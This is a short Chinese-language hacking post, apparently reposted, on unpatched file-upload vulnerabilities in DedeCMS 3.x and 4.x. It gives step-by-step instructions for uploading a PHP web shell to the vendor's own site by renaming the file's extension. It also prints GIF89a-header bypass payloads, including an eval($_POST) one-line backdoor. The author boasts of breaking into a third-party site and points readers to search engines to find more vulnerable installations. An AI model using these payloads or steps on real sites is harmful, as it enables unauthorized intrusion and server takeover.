|
准确来说应该是DEDECMS中所用的php版的FCKeditor存在上传漏洞,gif89a文件头欺骗,没想到在php版的FCKeditor中竟然存在这样的漏洞,gif89a文件头欺骗不算是新鲜东西了。
信息来源:B.S.T
3.X(作者:无月):
因为本人不懂PHP所以直接黑箱搞他.现在用官方做演示
官方地址http://www.dedecms.com/
首先注册个帐号,注册完以后直接在地址栏输入
http://www.dedecms.com/include/dialoguser/select_soft.php
或者include/dialoguser/select_media.php都可以,
我就选-软件管理器- 这里可以创建目录,可是貌似过滤了\".\"号.
在游览一个改了后缀名的PHP马,我这里把PHP马改成RAR后缀,你用其
他都可以,只要他支持就可以了,接着在右面的改名的地方把名字改成*.PHP.然后点确定
就上传上去了.我这里的路径就在 http://www.dedecms.com/upimg/userup/556/phshell.php
4.X:
在4 .x里面用到的是php版FCKeditor的修改版..../include/FCKeditor/editor/dialog/imageuser.php下.
<td align=\"right\" nowrap> 新图片:</td>
<td colspan=\"2\" nowrap><input name=\"imgfile\" type=\"file\" id=\"imgfile\" onChange=\"SeePic('picview',this);\" style=\"height:22\" class=\"binput\">
<input type=\"submit\" name=\"picSubmit\" id=\"picSubmit\" value=\" 上 传 \" style=\"height:22\" class=\"binput\"></td>
大家可以看到在上传拖上没有对picSubmit进行任何处理。但是却不能直接上传php马。因为会识别。
这是可乐修改的的php小马。
gif89a
<?php
phpinfo();
?>
RFI
gif89a
<?php
eval($_POST[c]);
?>
利用gif89a进行了欺骗。现在上传就可以成功了.然后有php一句话客户端连接.
就这么简单。十分白痴的漏洞。上次9you分站也存在这个漏洞。我进去一次.呵呵~
用织梦系统的利用百度搜下有很多.测试了下.只针对最新版。只有少数站静止asp.php.txt文件上传。
%80都是可以的.官方未发放补丁。 |
|